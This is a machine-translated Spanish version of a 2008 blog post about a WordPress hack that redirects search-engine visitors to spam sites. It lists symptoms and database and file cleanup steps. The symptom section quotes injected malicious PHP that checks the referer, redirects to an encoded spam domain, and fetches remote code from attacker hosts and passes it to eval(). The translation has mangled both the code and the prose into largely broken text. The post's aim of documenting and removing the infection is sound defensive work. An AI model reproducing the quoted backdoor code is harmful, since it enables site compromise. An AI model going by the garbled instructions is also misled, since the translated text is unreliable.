WordPress Hachazo: Recobrar y Apuro Google y Buscador o No Galleta Tr�fico Redirected a Su-Needs.info, AnyResults.Net, �ureo-Info.net y Otro Ilegal Sitios

Computoman�acos est� yendo total a hachazo y haza�a WordPress blogs albergue terminado el Web, plantando y inyecci�n difamatorio c�digo a WordPress c�digos y banco de datos para redirect visitantes y golpes desde Google y otro buscadores a spam sitios tal como su-needs.info, anyresults.net, �ureo-info.net, keymachine.de, beliy.us, seogoogle.us y mucho otro spam sitios aquel llenado con salario- por- chasqueo CPC anuncios. Unos hachazo aparecer a blanco mejor muchedumbre por redirecting todo sin WordPress galleta. Sin estado computoman�aco, �stos tr�fico supuestamente a llegar a el blog como destination.

S�ntomas de la Buscador Redirection Hachazo

Nota aquel no todos s�ntomas mayo acaecer totalmente. All� mayo estar m�s que un m�todo de hachazos existido, cu�l aportado a diferente descubrimiento y posible resoluci�n.

• Cualquier chasqueo a trav�s desde buscadores tal como Google, Yahoo, AOL, MSN, Ventanas Vivo b�squeda resultados, incluso blog nombre, testamento estar redirected y expedidor a computoman�acos’ sitios tal como su-needs.info, anyresults.net, �ureo-info.net, keymachine.de, beliy.us, seogoogle.us, con el lista cierto a crecer. Telespectador arribar al computoman�aco p�gina con el mismo b�squeda cordel aquel �l o ella acostumbr� b�squeda en buscador.
• Chasqueo en un v�nculo al blog en RSS alimentar lector tal como Google lector lata estar redirected a computoman�aco sitio tambi�n.
• UN visitante con no cuenta en la blog, o no iniciar sesi�n como ( de aqu� does no has galleta detectado por difamatorio c�digo), testamento estar redirected a spam sitios.
• �nico visitas desde buscador est� estado redirected ausente, y el burla manejar a hacer travesuras evidentemente mucho de bloggers, webmasters y sitio due�as, o a lo menos retraso el detective de la problema.
• Repentino huge y dram�tico baja y perder de macizo cantidad de visitantes tr�fico y p�gina vistas en tela rastreador estad�sticas, especialmente tr�fico con Google como remitido por, a�n cuando buscador resultados fila es intacto.
• Macizo baja de propaganda renta desde Google AdSense o otro anuncios red, o afiliado comisiones.
• El partidarias base en clave PHP c�digo mayo aparecer en la wp-blog-header.php lima:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ como $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falso){ $ser1=”?;pausa; }
si && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);salida; }? >

• Un imagen, cu�l es por cierto un ramo de difamatorio PHP c�digo, estado agregado a el wp- contenidos/ cargar director. Por ejemplo, wp- contenidos/ cargar/2008/06/06/abcdefghijklmn.jpg, o est� interior su tema carpeta, i.e. wp-contents/themes/classic/images/xyz.jpg. El nombre de la imagen mayo estar en el formato de xxxxxx_old.jpeg.
• Un entrada estado insertado en MySQL banco de datos por WordPress wp_options a activar el imagen ( el difamatorio PHP c�digo) como un tap�n, t�picamente como rss_f541b3abd05e7962fcab37737f40fad8.
• All� mayo estar tambi�n difamatorio c�digos, especialmente esos aquel int�rprete con evaluar() o base64_decode() mando estado insertado a otro WordPress PHP limas. Ejemplos est� el partidarias c�digos:

  ifisset_GET'p'(($[])) {
$calcet�n = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ calcet�n, ‘ obtener http:/km20725.keymachine.de/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ calcet�n, ‘ anfitri�n: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ calcet�n));
$contenido = implosionar(”, $ contenido);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ calcet�n);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress tema o sea estado activado y usado lata estar inyectado con pirater�a inform�tica c�digo y afectado tambi�n. Tal c�digo normalmente existir en header.php o index.php de la tema, y has un l�nea semejante al abajo

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

El WordPress b�squeda tr�fico redirect a spam sitio hachazo acaecer evidentemente due a seguridad agujero y vulnerabilidad o sea no compuesto cu�ndo blog due�a decidir no a versi�n mejorada a m�s reciente versi�n de WordPress ( aunque unosinformes aquel su blogs estado computoman�aco a�n cuando su’ ya en la m�s reciente versi�n de WordPress 2.5.1). Cualquier la causa, herej�a’ el apuro y soluci�n a resoluci�n y derrota el hachazo a asegurar aquel usted poseer dorso el tr�fico y ahorrar estado penalizado por Google por irrazonable redirecting a spam p�ginas.

1. Dorso el WordPress banco de datos.
2. Uso phpMyAdmin a examinar WordPress MySQL banco de datos mesas. Vaya wp_options mesa, y despu�s editar el fila nombrado active_plugins. El fila detalles todo activo tap�n aquel has estado activado. Pasar por el lista ( en un l�nea), y buscar un un tap�n nombrado concluido con un imagen extensi�n, tal como .jpg, .jpeg, .gif y etc. Por ejemplo, abcdefgh_old.jpeg. Notar el paso al imagen lima.
3. Usando sFTP o SSH ( olvidar acerca de PROTOCOLO DE TRANSFERENCIA DE ARCHIVOS o Telnet por seguridad), despu�s navegar al paso de la lima, y borrar el lima.
4. Vaya WordPress Administrador Tap�n panel, deactivate o activar cualquier tap�n a claro desconectado el difamatorio tap�n del “active_plugins” fila.
5. Dorso a phpMyAdmin, al wp_options mesa, obtener empleo fila aquel contener el partidarias cordel como option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Borrar el fila ausente.

   Si usted dont’ saber hacer actuar el banco de datos limpio detalle en pasos sobre, herej�a’ un v�deo cursillo:

6. Vaya wp_users mesa. Si all� es un sin nombre usuario ( ninguno valor en user_nicename campo) crear a 000000:: en 0000-00-00, notar el usuario IDENTIFICAR ( identificar campo, un n�mero de). Borrar el usuario.
7. Examinar el wp_usermeta mesa. Colocar todo filas con usuario partidos el IDENTIFICAR de la borrado ilegal usuario. All� est� normalmente tres filas estado asociado al invasor usuario Identificar. Borrar todo el asociado filas.
8. Iniciar sesi�n como al servidor a editar el tema limas, o examinar el tema limas’ c�digo en Tema Redactora de WordPress Administrador Dise�o panel. Cheque el header.php y index.php por cualquier sospechoso c�digo. Como mencionado sobre, buscar algo semejante al l�nea abajo:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Si fundar, borrar y mudanza el c�digo. Nota aquel el difamatorio c�digo testamento estar algunos l�neas largo en total.

9. Si su’ no ya existido, crear un vac�o index.html lima en el wp- contenidos/ tap�n director. El blanco index.html cueros el contenidos de la tap�n director, efectivamente escudo cu�l tap�n-ins estado usado desde computoman�acos a endurecer y tensar el WordPress seguridad.
10. Cargar y reponer cada una WordPress limas ( no solo wp-blog-header.php) en la servidor con el fresco, limpio, y originalm�s reciente versi�n desde WordPress (claro, excepto poco limas tal como wp-config.php y temas). Si su’ mejorando, lectura elgu�a cauteloso.
11. Cambio su contrase�a.
12. Si usted haber m�ltiple usuarios, cambio lo suyo contrase�a ( o preguntar est�n cambio el contrase�a) tambi�n.

importante: �ste es un m�quina traducido por p�gina cu�l es con tal que " como es" sin garant�a. M�quina traducci�n mayo estar dif�cil a comprender. Por favor aludir aoriginal Inglesa art�culo cuando sea posible.

Parte y contribuir o obtener soporte t�cnico y ayuda aMi Digital Vida Foros.

Relacionado Art�culos

• Agregar NoFollow Relaci�n a WordPress Blogroll a Aumento Buscapersonas
• WordPress Tap�n: Pantalla Google Anal�tico y FeedBurner Informes Estad�sticas desde Sitio Admin
• Technorati Entrante V�nculos Tap�n por WordPress
• UN Ojear Google Comerciante B�squeda
• C�mo a Ahorrar, Desv�o o Fuga Google Caj�n de arena
• Ask.com Buscador Repaso por CNNMoney
• Unidad M�s Tr�fico por Usando Im�genes
• SEO Amistoso Escribir de nuevo M�todo a Mover Telas LOCALIZADOR UNIFORME DE RECURSOS Desde Subdirectorio a Ra�z Padre Carpeta
• Integrar y Pantalla Google AdSense por B�squeda y Co-Op Personalizado Buscador Resultados en WordPress Blog P�gina Plantilla
• Cu�l Buscador es el mejor y M�s Pertinente?

Esto entrada estado colocado en Martes, Junio 10th, 2008 a 103: estoy y es lima bajoWeblogs. Usted lata seguir cualquier respuestas a esto entrada a trav�s elRSS 2.0 alimentar Usted latalicencia un respuesta,o seguibola desde su propio sitio.